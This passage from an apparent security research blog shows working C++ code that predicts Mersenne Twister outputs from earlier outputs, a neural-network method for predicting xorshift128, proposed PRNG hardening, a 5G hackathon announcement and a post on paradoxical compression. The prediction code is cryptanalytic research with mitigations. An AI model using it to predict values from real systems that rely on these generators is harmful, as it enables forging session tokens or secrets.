0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit in order in the output. Also, we can notice that only 8 bits in the first input affect the same 6 bits in the output. But for the second input, each bit is affecting several bits. Although we can write a closed-form logic expression for this, we would write a code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate the sequence of the random numbers and match the generated numbers from the function with the next generated number from the library. The output was 100% matching for several millions of generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number, which we XOR, and if the result of the XORing of them is one, we XOR the result with a constant, 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two possible output values, with or without XORing the result with 0x44081102. Here is the code segment for the new function.

#include<tuple>
  
using namespace std;

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve them. Studying those issues can be particularly useful when MT is used as a part of cryptographically-secure PRNG, like in CryptMT. CryptMT uses Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consist of two steps, twisting and tempering. Although the tempering step is applied on each step, the twisting step is only used when we exhaust all the states, and we need to twist the state array to create a new internal state. That is OK, algorithmically, but from the cybersecurity point of view, this is problematic. It makes the algorithm vulnerable to a different type of attack, namely a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number, and when it is much longer, the start of the new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of 0.4 ms of the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number using the progressive formula we have created earlier. Using this approach, we have updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they got the exact sequences. Also, when we evaluated the mean of the runtime of both MT implementations over millions of numbers generated, the new approach is a little more efficient but has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning that can correlate a generated output from MT to three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step on the old state at once and generate the new state from it. This can be achieved by doing the twist step in a new state array and swap the new state with the old one after twisting all the states. This will make the state prediction more complex as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 apart. And all the new states from 227 to 623 will be using the value of the old states from 0 to 396, which are 227 apart. This slight change will generate a more resilient PRNG for the above-suggested attack, as any generated output can be either 227  or 397 away from the output it depends on as we don’t know the position of the generated number (whether it is in the first 227 numbers from the state or in the last 397 ones). Although this will generate a different sequence, the new state’s prediction from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the outcome PRNG, such as periodicity.

5. Conclusion

In this series of posts, we have shared the methodology of cracking two of the well-known (non-cryptographic) Pseudo-Random Number Generators, namely xorshift128 and Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of the generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, and we trained two different NN models to tackle each problem separately. Then we used the two models together to predict the next sequence number in the sequence using three generated numbers. Also, we have shown how to deep dive into the models and understand how they work internally and how to use them to create a closed-form code that can break the Mersenne Twister (MT) PRNG. At last, we shared two possible techniques to improve the MT algorithm security-wise as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be itself used where cryptographic randomness is required).

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post [3] and the changes that are done in part 1 of this post.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

15 October 2021 at 17:29

Outline

1. Introduction

This blog post proposes an approach to crack Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking here, we mean that we can predict the sequence of the random numbers using previously generated numbers without the knowledge of the seed. We started by breaking a simple PRNG, namely XORShift, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post. Also, we have achieved a higher accuracy. This blog aims to show how to train a machine learning model that can reach 100% accuracy in generating random numbers without knowing the seed. And we also deep dive into the trained model to show how it worked and extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy without having the PRNG seed using a deep learning model. After training, the model can use any consecutive four generated numbers to replicate the same sequence of the PRNG with bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2]

At first glance, this seemed a bit counter-intuitive as the whole idea behind machine learning algorithms is to learn from the patterns in the data to perform a specific task, ranging from supervised, unsupervised to reinforcement learning. On the other hand, the pseudo-random number generators’ main idea is to generate random sequences and, hence, these sequences should not follow any pattern. So, it did not make any sense (at the beginning) to train an ML model, which learns from the data patterns, from PRNG that should not follow any pattern. Not only learn, but also get a 95% bitwise accuracy, which means that the model will generate the PRNG’s exact output and only gets, on average, two bits wrong. So, how is this possible? And why can machine learning crack the PRNG? Can we even get better than the 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let’s start first by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) could crack the xorshift128 PRNG, we need to comprehend how it works and check whether it is following any patterns or not. Let’s start by digging into its implementation of the xorshift128 PRNG algorithm to learn how it works. The code implementation of this algorithm can be found on Wikipedia and shared in [2]. Here is the function that was used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing the seed and the state of the PRNG simultaneously. Of course, we can update this generator implementation to provide the seed with a different function call instead of hardcoding it. Every time we call the generator, it will shift the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w. The new w is then returned as the new random number output of the random number generator. Let’s call the function output, o

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following output bits representations of the output, o:

O0 = W0 ^ W19 ^ X0 ^ X8

O1 = W1 ^ W20 ^ X1 ^ X9

.

.

O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four generated numbers from this PRNG, we can use the algorithm to generate the whole sequence; this could be the main reason why this algorithm is not cryptographically secure. Although the algorithm-generated numbers seem to be random with no clear relations between them, an attacker with the knowledge of the algorithm can predict the whole sequence of xorshift128 using any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know that there is some relation between the newly generated number and its last four ones without knowing the implementation of the algorithm.

Returning to the main question slightly: Can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation using only the last four inputs?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptron (MLP), is one of the most commonly used machine learning algorithms. It consists of small computing units, called neurons or perceptrons, organized into sets of unconnected neurons, called layers. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of 2 layers NN (the input layer is not counted). The details of the mathematical formulation of the NN are out of the scope of this article.

While the NN is being trained from the input data, the connections between the neurons, aka the weights, either get stronger (high positive or low negative values) to represent a high positively/negatively strong connection between two neurons or get weaker (close to 0) to represent that there is no connection at all. At the end of the training, these connections/weights encode the knowledge stored in the NN model. 

One example used to describe how NNs handle nonlinear data is NN’s use to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that although it is simple, its outputs are not linearly separable [3]. Hence, using an NN with two layers is the best way to represent the two input XOR gate. The following figure (from Abhranil blog [3]) shows how we can use a two-layer neural network to imitate a two-input XOR. The numbers on the lines are the weights, and the number inside the nodes are the thresholds (negative bias) and assuming using a step activation function. 

In case we have more than two inputs for XOR, we will need to increase the number of the nodes in the hidden layer (the layer in the middle) to make it possible to represents the other components of the XOR. 

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer as that is all we need to represent any set of XOR functions as implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like LSTM (“Long short-term memory,” a type of recurrent neural network), especially that all output bits are directly connected to sets of the input bits with XOR functions, as we have shown earlier, and there is no need for preserving internal states, as it is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model would have 128 inputs in the input layer to represent the last four generated integer numbers, 32-bit each, and 32 outputs in the output layer to express the next 32-bit random generated number. The main hyperparameter that we need to decide is the number of neurons/nodes in the hidden layer. We don’t want a few nodes that can not represent all the XOR functions terms, and at the same time, we don’t want to use a vast number of nodes that would not be used and would complex the model and increase the training time. In this case, and based on the number of inputs, outputs, and the XOR functions complexity, we made an educated guess and used 1024 hidden nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of the parameters of the output layer is 32,800 (1024×32 weights + 32 biases), which gets to a total of 164,896 parameters to train. Comparing to the model used in [1]:

_________________________________________________________________
Layer (type) Output Shape Param # ================================================================= lstm (LSTM) (None, 1024) 4329472 _________________________________________________________________ dense (Dense) (None, 512) 524800 _________________________________________________________________ dense_1 (Dense) (None, 512) 262656 _________________________________________________________________ dense_2 (Dense) (None, 512) 262656 _________________________________________________________________ dense_3 (Dense) (None, 512) 262656 _________________________________________________________________ dense_4 (Dense) (None, 512) 262656 _________________________________________________________________ dense_5 (Dense) (None, 32) 16416 ================================================================= Total params: 5,921,312 Trainable params: 5,921,312 Non-trainable params: 0 _________________________________________________________________

This complex model has around 6 million parameters to train, which will make the model training harder and take a much longer time to get good results. It could also easily be stuck in one of the local minima in that huge 6 million dimension space. Additionally, storing this model and serving it later will use 36 times the space needed to store/serve our model. Furthermore, the number of the model parameters affects the amount of required data to train the model; the more parameters, the more input data is needed to train it.

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function to be used in this case is “binary_crossentropy,” not “mse.” Without getting into the math of both of these loss functions, it is sufficient to say that we don’t care if the output is 0.8, 0.9, or even 100. All we care about is that the value crosses some threshold to be considered one or not to be considered zero. Another non-optimal choice of the parameter in that model is the activation function of the output layer.  As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for these types of nodes is usually a sigmoid function. On the contrary, that model uses a linear activation function to output any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but the training of that model will be more challenging and take more time. 

For the rest of the hyperparameters, we have used the same as in the model in [1]. Also, we used the same input sample as the other model, which consists of around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. Training and testing random number samples are formed into a quadrable of consequent random numbers to be used as inputs to the model, and the next random number is used as an output to the model. It is worth mentioning that we don’t think we need that amount of data to reach the performance we reached; we just tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarises the model parameters/ hyperparameters for our model in comparison with the model proposed in [1]:

NN Model in [1] Our Model
Model Type LSTM and Dense Network Dense Network
#Layers 7 2
#Neurons 1024 LSTM
2592 Dense 
1056 Dense
#Trainable Parameters 5,921,312
(4,329,472 only from the LSTM layer)
164,896
Activation Functions Hidden Layers: relu
Output Layer: linear
Hidden Layer: relu
Output Layer: sigmoid
Loss Function mse binary_crossentropy
Comparison between our proposed model and the model from the post in [1]

4.2 Model Results

After a few hours of model training and optimizing the hyperparameters, the NN model has achieved 100% bitwise training accuracy! Of course, we ran the test set through the model, and we got the same result with 100% bitwise accuracy. To be more confident about what we have achieved, we have generated a new sample of 100,000 random numbers with a different seed than those used to generate the previous data, and we got the same result of 100% bitwise accuracy. It is worth mentioning that although the referenced article achieved 95%+ bitwise accuracy, which looks like a promising result. However, when we evaluated the model accuracy (versus bitwise accuracy), which is its ability to generate the exact next random numbers without any bits flipped, we found that the model’s accuracy dropped to around 26%. Compared to our model, we have 100% accuracy.  The 95%+ bitwise is not failing only on 2 bits as it may appear (95% of 32 bit is less than 2), but rather these 5% errors are scattered throughout 14 bits. In other words, although the referenced model has bitwise accuracy of 95%+, 18 bits only would be 100% correct, and on average, 2 bits out of the rest of the 14 bits would be altered by the model.

The following table summarizes the two model comparisons:

NN Model in [1] Our Model
Bitwise Accuracy 95% + 100%
Accuracy 26% 100%
Bits could be Flipped (out of 32) 14 0
Models accuracy comparison

In machine learning, getting 100% accuracy is usually not good news. It normally means either we don’t have a good representation of the whole dataset, we are overfitting the model for the sample data, or the problem is deterministic that it does not need machine learning. In our case, it is close to the third choice. The xorshift128 PRNG algorithm is deterministic; we need to know which input bits are used to generate output bits, but the function to connect them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. So, for this problem, getting a 100% accurate model means that the ML model has learned the bits connection mappings between the input and output bits. So, if we get any consequent four random numbers generated from this algorithm, the model will generate the random numbers’ exact sequence as the algorithm does, without knowing the seed.

4.3 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the PRNG data and if it matches our expectations. 

4.3.1 Model First Layer Connections

As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation of xorshift128 PRNG only uses the first and last numbers of the four, called w and x, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs, the last four generated numbers merged, from the input layer to the hidden layer, the 1024 hidden nodes, of our trained model to see how strong they are connected and hence we can verify which bits are used to generate the outputs. The following figure shows the value of weights on the y-axes connecting each input, in x-axes, to the 1024 hidden nodes in the hidden layer. In other words, each dot on the graph represents the weight from any of the hidden nodes to the input in the x-axes:

As we can see, very few of the hidden nodes are connected to one of the inputs, where the weight is greater than ~2.5 or less than ~-2.5. The rest of the nodes with low weights between -2 and 2 can be considered not connected. We can also notice that inputs between bit 32 and 95 are not connected to any hidden layers. This is because what we stated earlier that the implementation of xorshift128 PRNG uses only x, bits from 0 to 31, and w, bits from 96 to 127, from the inputs, and the other two inputs, y, and z representing bits from 32 to 95, are not utilized to generate the output, and that is exactly what the model has learned. This implies that the model has learned that pattern accurately from the data given in the training phase.

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output, in x-axes, to the 1024 hidden nodes in the hidden layer:

Like our previous observation, each output bit is connected only to a very few nodes from the hidden layer, maybe except bit 11, which is less decisive and may need more training to be less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but we can do the rest the same way. If we focus only on bit 0 on the figure, we can see that it is connected only to five nodes from the hidden layers, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes, which we circled in the figure. They are bits 0, 8, 96, and 115, which if we modulo them by 32, we get bits 0 and 8 from the first number, x, and 0 and 19 from the fourth number, w. This matches the xorshift128 PRNG function we derived in section 2, the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8.  We expect the five hidden nodes with the one output node to resemble the functionality of an XOR  of these four input bits. Hence, the ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 11 bits to the right, which can be binary encoded as 010110, where the least significant bit, 0, represents the right direction. The variable x is shifted 19 bits to the right, which can be binary encoded as 100111, where the least significant bit, 1, represents the left direction. This representation will take 4 bits + 4×6 bits = 28 bits. For sure, we need to make sure that the 4 bits that select the variables do not have these values: 0000, 0001, 0010, 0100, and 1000, as they would select one or no variable to XOR. 

Using this simple update will add small complexity to PRNG algorithm implementation. It will still make the ML model learn only one possible sequence of about 16M different sequences generated with the same algorithm with different seeds. As if the ML would have only learned the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks, but the other properties of the outcome PRNG, such as periodicity, are yet to be studied.

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consequent numbers generated from this PRNG, it can generate the exact sequence without getting access to the seed. We also studied how we can design an NN model that would represent this PRNG the best. Here are some of the lessons learned from this article:

  1. Although xorshift128 PRNG may to humans appear to not follow any pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2.  Applying deep learning to predict PRNG output requires understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models would attain higher accuracy that simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post in [1] with the changes explained in this post. This was intentionally done to keep the same data and other parameters unchanged for a fair comparison.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The repo for code implementation  for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/

NCC Group placed first in global 5G Cyber Security Hack competition

14 October 2021 at 09:00

In June of this year, Traficom – the Finnish transport and communications agency – along with the Aalto University, Cisco, Ericsson, Nokia, and PwC, organized the 5G Cyber Security Hack competition. A similar event was organised in November 2019 in Oulu, Finland and this hackathon-style event was a follow-up to their successful 2019 event. Due to Covid restrictions, this year’s event was fully remote and as such made it easier for a larger pool of security experts to take part. Similar to 2019, there were four interesting hacking challenges relating to 5G technology and its use cases. The NCC Group team participated in the 2019 event and finished in second place in the Ericsson challenge, so we were eager to take on this year’s challenge.  A large number of participants took part in the event this year with around 130 security experts from around the world, and teams are invited to participate by application only.

This year, NCC Group consultants, Ross Bradley, Eva Esteban Molina, Phil Marsden and Mark Tedman took part in the Ericsson “Hack the Crown Jewels” challenge, for which they won first prize.

5G networks offer greater connectivity and faster wireless broadband and are now being rolled out over a large proportion of the world with it now being used extensively by 250+ million subscribers world-wide. With that comes the exponential increase in 5G speed and capacity, and there has been a decisive shift in technology development pushing new capability from home networks to critical national infrastructures all using 5G equipment. The security of 5G networks is now high on the agenda of many operators, vendors and governments and excellent events like the 5G Cyber Security hackathon highlight the continuing work ongoing to help secure these networks. 

This Hack challenge offered hackers four real-life use cases for 5G to work on – a Cisco CTF challenge on a staged 5G network, a 5G Ericsson Packet Core Gateway, Nokia’s edge data center system and PwC/Aalto University’s 5G testbed.

The Hack is admittedly fun, but it isn’t just for fun – these kinds of activities play a really crucial part in the iterative design and engineering process for network equipment manufacturers to ensure the security and safety of users. Each company putting forward a use case for hacking also offering up bug bounty prize money, which is shared among the best hacker(s) / team(s), as one mechanism for helping vendors to ideally find and remediate security risks in their systems before threat actors can exploit them.

The 5G Packet Core Gateway challenge

The details of the overall event, including the findings of individual challenges, are subject to non-disclosure agreements, but the exercise itself was a great demonstration of our Telecommunication Practice’s capability. The 5G Ericsson Packet Core Gateway is a key part of the mobile 5G core infrastructure and it is essential that all vendors understand how vulnerabilities and security risks within it could be exploited by an attacker. We dedicated our time to on the Ericsson challenge, which focussed on finding security weaknesses in the backbone of the mobile 5G core infrastructure – the Packet Core Gateway.

The hackathon started with an introduction on Friday evening, with challenges opening up to competitors at 8pm. Hacking continued all weekend till 11am on the Sunday morning. Our findings were shared throughout the competition with the Ericsson team, with final findings submitted before the 11am deadline on the Sunday morning. Prizes were award on the Sunday afternoon at which time it was revealed we had won the Ericsson challenge (plus come second in the team photo)! The event was well-run by the Ericsson team and the event organisers and we look forward to participating in any future events. 

About NCC Group’s Telecommunications Practice

This competition is just one of the many ways that NCC Group is actively improving the security of 5G infrastructure. In addition to our 5G security research (some of which is published on this blog), we regularly work closely with network equipment manufacturers and operators alike, including through paid consulting engagements. We conduct regular security reviews of 5G core and RAN equipment, with specialist researchers and consultants skilled in everything from reverse engineering and hardware reviews to detailed high level threat assessments.

Paradoxical Compression with Verifiable Delay Functions

13 October 2021 at 10:00

We present here a new construction which has no real immediate usefulness, but is a good illustration of a fundamental concept of cryptography, namely that there is a great difference between knowing that some mathematical object exists, and being able to build it in practice. Thus, this construction can be thought of as having some educational virtue, in the spirit of the mathematical recreations that have been a favourite pastime of mathematicians since at least the early 17th century.

We call paradoxical compression a lossless compression algorithm such that:

  • On any input x (a sequence of bits), it produces an output C(x) (another sequence of bits) such that the original x can be rebuilt from C(x) (the compression is lossless).
  • There is at least one input x0 such that C(x0) is strictly shorter than x0 (the algorithm really deserves to be called a compression algorithm).
  • The input size is never increased: for all x, C(x) is never strictly longer than x.

This is mathematically impossible. There is no compression algorithm that can achieve these three properties simultaneously. Despite this impossibility, we can achieve it in practice. A paper describing the algorithm, and a demo implementation, are available at:
https://github.com/pornin/paradox-compress

The paper is also available on eprint.

A Few Important Warnings

  • This is not “infinite compression”. We are not talking about a compression algorithm that could reduce the size of every possible input. That would be very useful indeed, but it is impossible, and, so to speak, a lot more impossible than paradoxical compression. We merely claim that the output is not larger than the input, not that it is always shorter.
  • Both paradoxical and infinite compression have been “achieved” by various people when working on files by moving some information into the file metadata (file name, date of creation or last modification…). We are not dealing here with such tricks; our inputs and outputs are generic sequences of bits, that do not have any metadata.

On the Impossibility of Paradoxical Compression

Let x0 be an input which is reduced by the compression algorithm. For instance, suppose that x0 has length 1000 bits, bit C(x0) has length 900 bits. For the compression algorithm to deserve that name, such an input must exist.

There are exactly 2901-1 possible bit sequences of up to 900 bits. Every one of them should be compressible into another bit sequence of up to 900 bits. Thus, all 2901-1 bit sequences are mapped to bit sequences in the same set. But the mapping must be injective: if two bit sequences are mapped to the same output, then that output cannot be reliably decompressed, since there would be two corresponding inputs. The hypothesis of losslessness forbids that situation. Therefore, all 2901-1 bit sequences of length up to 900 bits are mapped by the compression algorithm to 2901-1 distinct bit sequences of length up to 900 bits. This necessarily exhausts all of them, in particular C(x0). This implies that the compression of x0 produces an output which is also the result of compressing another input x1 distinct from x0 (since x1 has length at most 900 bits, while x0 has length 1000 bits). This is a contradiction: the compression algorithm cannot be lossless.

This simple demonstration is an application of what is now known as the pigeonhole principle, a well-known remark that can be expressed in set theory as follows: there cannot be an injective mapping from a finite set S1 to a finite set S2 if the cardinality of S2 is strictly lower than the cardinality of S1. In the early 17th century, the French Jesuit Jean Leucheron used it to explain that there necessarily are at least two men in the world with the same number of hair, since there are more men in the world than hairs on the head of any single man. The principle was restated several times along the centuries, with various metaphors, one of the most recent ones involving pigeons in a dovecote.

